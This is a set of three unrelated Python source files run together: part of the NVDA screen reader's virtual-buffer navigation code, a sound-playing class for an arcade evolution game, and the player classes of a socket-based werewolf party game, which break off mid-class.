if obj.role == controlTypes.ROLE_TOOLBAR:
return True
obj = obj.parent
return False
def event_caretMovementFailed(self, obj, nextHandler, gesture=None):
if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]:
return nextHandler()
if gesture.mainKeyName in ("home", "end"):
# Home, end, control+home and control+end should not disable pass through.
return nextHandler()
script = self.getScript(gesture)
if not script:
return nextHandler()
# We've hit the edge of the focused control.
# Therefore, move the virtual caret to the same edge of the field.
info = self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(info.UNIT_CONTROLFIELD)
if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"):
info.collapse()
else:
info.collapse(end=True)
info.move(textInfos.UNIT_CHARACTER, -1)
info.updateCaret()
scriptHandler.queueScript(script, gesture)
def script_disablePassThrough(self, gesture):
if not self.passThrough or self.disableAutoPassThrough:
return gesture.send()
self.passThrough = False
self.disableAutoPassThrough = False
browseMode.reportPassThrough(self)
script_disablePassThrough.ignoreTreeInterceptorPassThrough = True
def script_collapseOrExpandControl(self, gesture):
oldFocus = api.getFocusObject()
oldFocusStates = oldFocus.states
gesture.send()
if controlTypes.STATE_COLLAPSED in oldFocusStates:
self.passThrough = True
elif not self.disableAutoPassThrough:
self.passThrough = False
browseMode.reportPassThrough(self)
script_collapseOrExpandControl.ignoreTreeInterceptorPassThrough = True
def _tabOverride(self, direction):
"""Override the tab order if the virtual buffer caret is not within the currently focused node.
This is done because many nodes are not focusable and it is thus possible for the virtual buffer caret to be unsynchronised with the focus.
In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual buffer caret.
If the virtual buffer caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation.
Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned.
@param direction: The direction in which to move.
@type direction: str
@return: C{True} if the tab order was overridden, C{False} if not.
@rtype: bool
"""
focus = api.getFocusObject()
try:
focusInfo = self.makeTextInfo(focus)
except:
return False
# We only want to override the tab order if the caret is not within the focused node.
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
#Only check that the caret is within the focus for things that ar not documents
#As for documents we should always override
if focus.role!=controlTypes.ROLE_DOCUMENT or controlTypes.STATE_EDITABLE in focus.states:
# Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if focusInfo.isOverlapping(caretInfo):
return False
# If we reach here, we do want to override tab/shift+tab if possible.
# Find the next/previous focusable node.
try:
item = next(self._iterNodesByType("focusable", direction, caretInfo))
except StopIteration:
return False
obj=self.getNVDAObjectFromIdentifier(*item.vbufFieldIdentifier)
newInfo=item.textInfo
if obj == api.getFocusObject():
# This node is already focused, so we need to move to and speak this node here.
newCaret = newInfo.copy()
newCaret.collapse()
self._set_selection(newCaret,reason=controlTypes.REASON_FOCUS)
if self.passThrough:
obj.event_gainFocus()
else:
speech.speakTextInfo(newInfo,reason=controlTypes.REASON_FOCUS)
else:
# This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest.
obj.setFocus()
return True
def script_tab(self, gesture):
if not self._tabOverride("next"):
gesture.send()
def script_shiftTab(self, gesture):
if not self._tabOverride("previous"):
gesture.send()
def event_focusEntered(self,obj,nextHandler):
if obj==self.rootNVDAObject:
self._enteringFromOutside = True
if self.passThrough:
nextHandler()
def _shouldIgnoreFocus(self, obj):
"""Determines whether focus on a given object should be ignored.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if focus on L{obj} should be ignored, C{False} otherwise.
@rtype: bool
"""
return False
def _postGainFocus(self, obj):
"""Executed after a gainFocus within the virtual buffer.
This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler.
@param obj: The object that gained focus.
@type obj: L{NVDAObjects.NVDAObject}
"""
def _replayFocusEnteredEvents(self):
# We blocked the focusEntered events because we were in browse mode,
# but now that we've switched to focus mode, we need to fire them.
for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]:
try:
parent.event_focusEntered()
except:
log.exception("Error executing focusEntered event: %s" % parent)
def event_gainFocus(self, obj, nextHandler):
enteringFromOutside=self._enteringFromOutside
self._enteringFromOutside=False
if not self.isReady:
if self.passThrough:
nextHandler()
return
if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj:
# We're entering the document from outside (not returning from an inside object/application; #3145)
# and this was the last non-root node with focus, so ignore this focus event.
# Otherwise, if the user switches away and back to this document, the cursor will jump to this node.
# This is not ideal if the user was positioned over a node which cannot receive focus.
return
if obj==self.rootNVDAObject:
if self.passThrough:
return nextHandler()
return
if not self.passThrough and self._shouldIgnoreFocus(obj):
return
self._lastFocusObj=obj
try:
focusInfo = self.makeTextInfo(obj)
except:
# This object is not in the virtual buffer, even though it resides beneath the document.
# Automatic pass through should be enabled in certain circumstances where this occurs.
if not self.passThrough and self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS):
self.passThrough=True
browseMode.reportPassThrough(self)
self._replayFocusEnteredEvents()
return nextHandler()
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if not self._hadFirstGainFocus or not focusInfo.isOverlapping(caretInfo):
# The virtual buffer caret is not within the focus node.
oldPassThrough=self.passThrough
passThrough=self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS)
if not oldPassThrough and (passThrough or sayAllHandler.isRunning()):
# If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop.
# This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change.
speech.cancelSpeech()
self.passThrough=passThrough
if not self.passThrough:
# We read the info from the buffer instead of the control itself.
speech.speakTextInfo(focusInfo,reason=controlTypes.REASON_FOCUS)
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj,controlTypes.REASON_ONLYCACHE)
else:
if not oldPassThrough:
self._replayFocusEnteredEvents()
nextHandler()
focusInfo.collapse()
self._set_selection(focusInfo,reason=controlTypes.REASON_FOCUS)
else:
# The virtual buffer caret was already at the focused node.
if not self.passThrough:
# This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking.
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj,controlTypes.REASON_ONLYCACHE)
else:
return nextHandler()
self._postGainFocus(obj)
event_gainFocus.ignoreIsReady=True
def _handleScrollTo(self, obj):
"""Handle scrolling the buffer to a given object in response to an event.
Subclasses should call this from an event which indicates that the buffer has scrolled.
@postcondition: The buffer caret is moved to L{obj} and the buffer content for L{obj} is reported.
@param obj: The object to which the buffer should scroll.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if the buffer was scrolled, C{False} if not.
@rtype: bool
@note: If C{False} is returned, calling events should probably call their nextHandler.
"""
if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4:
# This event was probably caused by this buffer's call to scrollIntoView().
# Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point.
# However, pretend we handled it, as we don't want it to be passed on to the object either.
return True
try:
scrollInfo = self.makeTextInfo(obj)
except:
return False
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if not scrollInfo.isOverlapping(caretInfo):
if scrollInfo.isCollapsed:
scrollInfo.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(scrollInfo,reason=controlTypes.REASON_CARET)
scrollInfo.collapse()
self.selection = scrollInfo
return True
return False
def _getTableCellCoords(self, info):
if info.isCollapsed:
info = info.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if "table-id" in attrs and "table-rownumber" in attrs:
break
else:
raise LookupError("Not in a table cell")
return (int(attrs["table-id"]),
int(attrs["table-rownumber"]), int(attrs["table-columnnumber"]),
int(attrs.get("table-rowsspanned", 1)), int(attrs.get("table-columnsspanned", 1)))
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
if not axis:
# First or last.
if movement == "first":
startPos = None
direction = "next"
elif movement == "last":
startPos = self.makeTextInfo(textInfos.POSITION_LAST)
direction = "previous"
try:
return next(self._iterTableCells(tableID, startPos=startPos, direction=direction))
except StopIteration:
raise LookupError
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return next(self._iterTableCells(tableID, row=destRow, column=destCol))
except StopIteration:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _tableMovementScriptHelper(self, movement="next", axis=None):
if isScriptWaiting():
return
formatConfig=config.conf["documentFormatting"].copy()
formatConfig["reportTables"]=True
formatConfig["includeLayoutTables"]=True
try:
tableID, origRow, origCol, origRowSpan, origColSpan = self._getTableCellCoords(self.selection)
except LookupError:
# Translators: The message reported when a user attempts to use a table movement command
# when the cursor is not within a table.
ui.message(_("Not in a table cell"))
return
try:
info = self._getNearestTableCell(tableID, self.selection, origRow, origCol, origRowSpan, origColSpan, movement, axis)
except LookupError:
# Translators: The message reported when a user attempts to use a table movement command
# but the cursor can't be moved in that direction because it is at the edge of the table.
ui.message(_("edge of table"))
# Retrieve the cell on which we started.
info = next(self._iterTableCells(tableID, row=origRow, column=origCol))
speech.speakTextInfo(info,formatConfig=formatConfig,reason=controlTypes.REASON_CARET)
info.collapse()
self.selection = info
def script_nextRow(self, gesture):
self._tableMovementScriptHelper(axis="row", movement="next")
# Translators: the description for the next table row script on virtualBuffers.
script_nextRow.__doc__ = _("moves to the next table row")
def script_previousRow(self, gesture):
self._tableMovementScriptHelper(axis="row", movement="previous")
# Translators: the description for the previous table row script on virtualBuffers.
script_previousRow.__doc__ = _("moves to the previous table row")
def script_nextColumn(self, gesture):
self._tableMovementScriptHelper(axis="column", movement="next")
# Translators: the description for the next table column script on virtualBuffers.
script_nextColumn.__doc__ = _("moves to the next table column")
def script_previousColumn(self, gesture):
self._tableMovementScriptHelper(axis="column", movement="previous")
# Translators: the description for the previous table column script on virtualBuffers.
script_previousColumn.__doc__ = _("moves to the previous table column")
APPLICATION_ROLES = (controlTypes.ROLE_APPLICATION, controlTypes.ROLE_DIALOG)
def _isNVDAObjectInApplication(self, obj):
"""Determine whether a given object is within an application.
The object is considered to be within an application if it or one of its ancestors has an application role.
This should only be called on objects beneath the buffer's root NVDAObject.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if L{obj} is within an application, C{False} otherwise.
@rtype: bool
"""
while obj and obj != self.rootNVDAObject:
if obj.role in self.APPLICATION_ROLES:
return True
obj = obj.parent
return False
NOT_LINK_BLOCK_MIN_LEN = 30
def _iterNotLinkBlock(self, direction="next", pos=None):
links = self._iterNodesByType("link", direction=direction, pos=pos)
# We want to compare each link against the next link.
item1 = next(links)
while True:
item2 = next(links)
# If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar.
if direction == "next" and item2.textInfo._startOffset - item1.textInfo._endOffset > self.NOT_LINK_BLOCK_MIN_LEN:
yield VirtualBufferQuickNavItem("notLinkBlock",self,0,item1.textInfo._endOffset, item2.textInfo._startOffset)
# If we're moving backwards, the order of the links in the document will be reversed.
elif direction == "previous" and item1.textInfo._startOffset - item2.textInfo._endOffset > self.NOT_LINK_BLOCK_MIN_LEN:
yield VirtualBufferQuickNavItem("notLinkBlock",self,0,item2.textInfo._endOffset, item1.textInfo._startOffset)
item1=item2
def _getInitialCaretPos(self):
"""Retrieve the initial position of the caret after the buffer has been loaded.
This position, if any, will be passed to L{makeTextInfo}.
Subclasses should extend this method.
@return: The initial position of the caret, C{None} if there isn't one.
@rtype: TextInfo position
"""
if self.shouldRememberCaretPositionAcrossLoads:
try:
return self.rootNVDAObject.appModule._vbufRememberedCaretPositions[self.documentConstantIdentifier]
except KeyError:
pass
return None
def _get_documentConstantIdentifier(self):
"""Get the constant identifier for this document.
This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application.
Generally, the document URL should be used.
@return: The constant identifier for this document, C{None} if there is none.
"""
return None
def _get_shouldRememberCaretPositionAcrossLoads(self):
"""Specifies whether the position of the caret should be remembered when this document is loaded again.
This is useful when the browser remembers the scroll position for the document,
but does not communicate this information via APIs.
The remembered caret position is associated with this document using L{documentConstantIdentifier}.
@return: C{True} if the caret position should be remembered, C{False} if not.
@rtype: bool
"""
docConstId = self.documentConstantIdentifier
# Return True if the URL indicates that this is probably a web browser document.
# We do this check because we don't want to remember caret positions for email messages, etc.
return isinstance(docConstId, basestring) and docConstId.split("://", 1)[0] in ("http", "https", "ftp", "ftps", "file")
def getEnclosingContainerRange(self,range):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in range.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER:
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets=range._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
def script_moveToStartOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
# Translators: Reported when the user attempts to move to the start or end of a container (list, table, etc.)
# But there is no container.
ui.message(_("Not in a container"))
return
container.collapse()
self._set_selection(container, reason=browseMode.REASON_QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS)
script_moveToStartOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET
# Translators: Description for the Move to start of container command in browse mode.
script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table")
def script_movePastEndOfContainer(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(textInfos.UNIT_CHARACTER)
container=self.getEnclosingContainerRange(info)
if not container:
ui.message(_("Not in a container"))
return
container.collapse(end=True)
if container._startOffset>=container._getStoryLength():
container.move(textInfos.UNIT_CHARACTER,-1)
# Translators: a message reported when:
# Review cursor is at the bottom line of the current navigator object.
# Landing at the end of a browse mode document when trying to jump to the end of the current container.
ui.message(_("bottom"))
self._set_selection(container, reason=browseMode.REASON_QUICKNAV)
if not willSayAllResume(gesture):
container.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(container, reason=controlTypes.REASON_FOCUS)
script_movePastEndOfContainer.resumeSayAllMode=sayAllHandler.CURSOR_CARET
# Translators: Description for the Move past end of container command in browse mode.
script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table")
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = unicode(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
__gestures = {
"kb:NVDA+d": "activateLongDesc",
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
"kb:escape": "disablePassThrough",
"kb:alt+upArrow": "collapseOrExpandControl",
"kb:alt+downArrow": "collapseOrExpandControl",
"kb:tab": "tab",
"kb:shift+tab": "shiftTab",
"kb:control+alt+downArrow": "nextRow",
"kb:control+alt+upArrow": "previousRow",
"kb:control+alt+rightArrow": "nextColumn",
"kb:control+alt+leftArrow": "previousColumn",
"kb:shift+,": "moveToStartOfContainer",
"kb:,": "movePastEndOfContainer",
}
|
sound.py
|
import arcade
from game.constants import *
import time
import threading
class Sound:
def __init__(self):
self.path_sound_list = [FLY_SOUND_EAT,
FLY_SOUND_DEATH,
SPIDER_SOUND_EAT,
SPIDER_SOUND_DEATH,
BIRD_SOUND_EAT,
BIRD_SOUND_DEATH,
CAT_SOUND_EAT,
CAT_SOUND_DEATH,
SHARK_SOUND_EAT,
SHARK_SOUND_DEATH,
GODZILLA_EAT,
GODZILLA_WIN] # This will be merged with Victory
self.sound_list = []
self.poop_death = arcade.load_sound(POOP_DEATH)
self._godzilla_consume_sound = arcade.load_sound(GODZILLA_EAT)
for x in self.path_sound_list:
if x is not None:
# arcade.load_sound(x)
self.sound_list.append(arcade.load_sound(x))
else:
self.sound_list.append(arcade.load_sound(FOO_SOUND))
self.cur_evolution_index = 0
def death(self, evolution):
if evolution == -1:
self._playsound(self.poop_death)
# elif evolution == 7:
# self._playgodzilla_consume()
else:
death_num = evolution * 2 + 1
# print(f"DeathNum: {death_num}")
self._playsound(self.sound_list[death_num])
def consume(self, evolution):
# print(f"Consume evolution num: {evolution}")
self.cur_evolution_index = evolution
thread = threading.Thread(target=self._consume_threading_target)
thread.start()
def _consume_threading_target(self):
time.sleep(CONSUME_DELAY)
death_num = self.cur_evolution_index * 2
# print(f"consume num: {death_num}")
self._playsound(self.sound_list[death_num])
def _playgodzilla_consume(self):
arcade.play_sound(self._godzilla_consume_sound, SOUND_VOLUME)
def _playsound(self, index):
arcade.play_sound(index, SOUND_VOLUME)
pass
def play_win(self):
sound = arcade.load_sound(VICTORY_SOUND)
arcade.play_sound(sound, SOUND_VOLUME)
|
abstraction.py
|
import socket
from threading import Thread
from typing import Optional, List
from ..WP.api import ChunckedData, ReceiveThread, TimeLock
defaultTimeout: float = 180.0 # 超时时间,是各方法的默认参数
def default_timeout(timeout=None) -> float:
"""
Get or set the default timeout value.
Parameter:
- float or `None`
* float: set the default timeout value
* `None`: get the default timeout value
Returns:
* float, the value of the default timeout
"""
global defaultTimeout
if timeout is not None and timeout > 0:
defaultTimeout = timeout
return defaultTimeout
class Person():
"""
Base class for a player.
Attributes:
id: the identifier of the player.
socket: the outgoing socket for communication with the client
recv: the incoming socket for communication with the client
client: the (ip, port) tuple format of address of the client
server: the (ip, port) tuple format of address of the server
police: bool, whether the player is the police
innocent: bool, whether the player is innocent, this attribute is for the predictor
alive: bool whether the player is alive
Private methods:
_getBasePacket(): Get a template of the packet
_startListening(): Listen to the port and return the data received
Methods:
vote(): Inform the client to vote for the exiled
joinElection(): Ask the client to join the election
voteForPolice(): Inform the client to vote for the police
setPolice(): The result of the vote
speak(): The player communicate with each other in day
onDead(): Perform actions after the player is killed
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialize the player
Parameters:
id: int, provided by the upper layer
client: tuple, in form of (ip, port)
server: tuple, same with client
Returns:
Person, the objcet created.
"""
# AF_INET:使用TCP/IP-IPv4协议簇;SOCK_STREAM:使用TCP流
self.socket = connection
self.server = self.socket.getsockname()
self.client = self.socket.getpeername()
self.id = id
self.police = False # police的值由服务器进行分配,在__init__()方法中被初始化为False
self.innocent = True # 如果某个客户端是狼人,则innocent的值为False;否则为True
self.alive = True
def _getBasePacket(self) -> dict:
"""
Gets a packet for modification
Parameters:
None
Returns:
dict, containing the IP address and the port of the client and the server.
"""
ret = {}
ret['srcAddr'] = self.server[0]
ret['srcPort'] = self.server[1]
ret['destAddr'] = self.client[0]
ret['destPort'] = self.client[1]
return ret
def _startListening(self, timeout=0) -> ReceiveThread:
"""
Listen to the client for a specified time.
Parameters:
timeout: float, time to wait for the client
Returns:
ChunckedData, the data received
"""
recevingThread = ReceiveThread(self.socket, timeout)
recevingThread.start()
return recevingThread
def inform(self, content: str):
packet = self._getBasePacket()
packet['content'] = content
packetSend = ChunckedData(4, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def informDeath(self):
packet = self._getBasePacket()
packetSend = ChunckedData(8, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def informResult(self, result: bool):
packet = self._getBasePacket()
packet['result'] = result
packetSend = ChunckedData(-8, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
def vote(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to vote for the exiled.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['prompt'] = "请投票要执行放逐的玩家:\n"
packet['timeLimit'] = timeout
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
def joinElection(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to join the police election.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = 'bool'
packet['prompt'] = '请所有玩家上警\n你有%d秒的选择时间\n输入True选择上警,输入False选择不上警:\n' % (
int(timeout), )
packet['timeLimit'] = timeout
packet['iskill'] = False
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send, args=(self.socket,))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
def policeSetseq(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
Send a package to a player to vote for the police.
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
if self.police:
packet = self._getBasePacket()
packet['prompt'] = "请选择玩家发言顺序,True表示顺时针发言,False表示逆时针发言:\n"
packet['timeLimit'] = timeout
packet['iskill'] = False
packet['format'] = "bool"
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
else:
return None
def setPolice(self, val: bool = True):
"""
Set the player to be the police.
Parameters:
val: bool, whether the player is the police
Returns:
None
"""
self.police = val
def voteForPolice(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
Send a package to the police to choose the sequence.
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
if not self.police:
packet = self._getBasePacket()
packet['prompt'] = "请投票:"
packet['timeLimit'] = timeout
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
else:
return None
def speak(self, timeout: float = defaultTimeout) -> ReceiveThread:
"""
Send a package to a player to talk about the situation before the vote.
Parameters:
timeout: float, time to wait for the client
Returns:
ReceiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['timeLimit'] = timeout
packetSend = ChunckedData(6, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout=timeout)
# def sendMessage(self, data: list = []):
# packet = self._getBasePacket()
# packet['description'] = '\n'.join(data)
# packet['parameter'] = tuple()
# sendingThread = Thread(target=packetSend.send(), args=(self.socket, ))
# sendingThread.start()
def onDead(self, withFinalWords: bool, timeouts: float):
"""
Called on the death of a player.
Parameters:
withFinalWords: bool, whether the player can talk at death.
timeouts: tuple, the timeout limit for two actions.
Returns:
a tuple, containing the following item:
ChunckedData or None: the player inherit the police
ChunckedData or None: the comment of the player
"""
self.alive = False
ret = []
if self.police:
packet = self._getBasePacket()
packet['prompt'] = "请选择要继承警徽的玩家:\n"
packet['timeLimit'] = timeouts
packetSend = ChunckedData(7, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
ret.append(self._startListening(timeout=timeouts))
ret[-1].join()
else:
ret.append(None)
if withFinalWords:
packet = self._getBasePacket()
packet['timeLimit'] = timeouts
packetSend = ChunckedData(6, **packet)
sendingThread = Thread(
target=packetSend.send, args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
ret.append(self._startListening(timeout=timeouts))
ret[-1].join()
else:
ret.append(None)
return tuple(ret)
class Villager(Person):
"""
Villager, player without any additional skills.
Attributes and methods are inherited from class Person
"""
def __init__(self, id: int, connection: socket.socket):
super().__init__(id, connection)
self.type = 0
class Wolf(Person):
"""
Werewolves, can wake up at night to kill someone.
Attributes:
Some attributes are inherited from class Person without modification
innocent: bool, inherited from class Person, but initialized to False
peerList: list, other wolves in the game
Methods:
Some methods are inherited from class Person without modification
setPeer(): used for the server to add other wolves to the list
removePeer(): used for the server to remove a wolf when it's killed
kill(): ask the client to kill a player
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialization method inherited from class Person
"""
super().__init__(id, connection)
self.innocent = False
self.type = -1
self.peerList: List[Wolf] = []
def setPeer(self, peer):
"""
Add a wolf to the list
"""
self.peerList.append(peer)
def removePeer(self, peer):
"""
Remove a wolf from the list
"""
self.peerList.remove(peer)
def kill(self, timeout: float = defaultTimeout) -> Optional[ReceiveThread]:
"""
Wolves communicate with each other and specifying the victim
Parameters:
timeout: float, time to wait for the client
Returns:
receiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = "int"
packet['prompt'] = "狼人请刀人。\n你有%d秒的时间与同伴交流\n输入任何文本可以与同伴交流,输入数字投票" % (
int(timeout), )
packet['timeLimit'] = timeout
packet['iskill'] = True
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket,))
sendingThread.setDaemon(True)
sendingThread.start()
timer = TimeLock(timeout)
timer.setDaemon(True)
timer.start()
recv: Optional[ReceiveThread] = None
recv = self._startListening(timeout)
while not timer.getStatus():
if recv.getResult() is None:
continue
elif recv.getResult().type == -3:
return recv
elif recv.getResult().type == 5:
packet: dict = recv.getResult().content.copy()
recv = self._startListening(timeout)
packet['content'] = "%d号玩家发言:\t" % (
self.id, ) + packet['content']
for peer in self.peerList:
packet.update(**peer._getBasePacket())
packetSend = ChunckedData(5, **packet)
thread = Thread(target=packetSend.send,
args=(peer.socket, ))
thread.setDaemon(True)
thread.start()
return recv
class SkilledPerson(Person):
"""
Villiagers with skills. Some skill could be used only once, but some can use indefinitely.
Attributes:
used: int, if the value is True, the player can no longer use the ability
Methods:
skill(): ask a player to use his ability.
postSkill(): set ability availibity.
"""
def __init__(self, id: int, connection: socket.socket):
"""
Initialization method inherited from class Person
"""
super(SkilledPerson, self).__init__(id, connection)
self.used: int = 0
def postSkill(self, increment=1):
"""
Sets the used attribute of the player to True
"""
self.used += increment
def skill(self, prompt: str = "", timeout: float = defaultTimeout, format: str = "int") -> ReceiveThread:
"""
Ask the player whether to use the skill
Parameters:
timeout: float, time to wait for the client
format: the accepted parameter type
Returns:
receiveThread, the thread receiving from the client
"""
packet = self._getBasePacket()
packet['format'] = format
packet['prompt'] = prompt
packet['timeLimit'] = timeout
packet['iskill'] = False
packetSend = ChunckedData(3, **packet)
sendingThread = Thread(target=packetSend.send,
args=(self.socket, ))
sendingThread.setDaemon(True)
sendingThread.start()
return self._startListening(timeout)
class KingOfWerewolves(Wolf, SkilledPerson):
"""
King of werewolves, can kill a person when not being poisoned.
Attributes and methods are inherited from class SkilledPerson.
"""
def __init__(self, id: int, connection: socket.socket):
super(KingOfWerewolves, self).__init__(id, connection)
self.type = -3
def skill(self, timeout: float = defaultTimeout):
prompt = """Please select a person to kill.
you have %f seconds to decide.""" % (timeout, )
return SkilledPerson.skill(self, prompt, timeout)
class WhiteWerewolf(Wolf, SkilledPerson):
"""
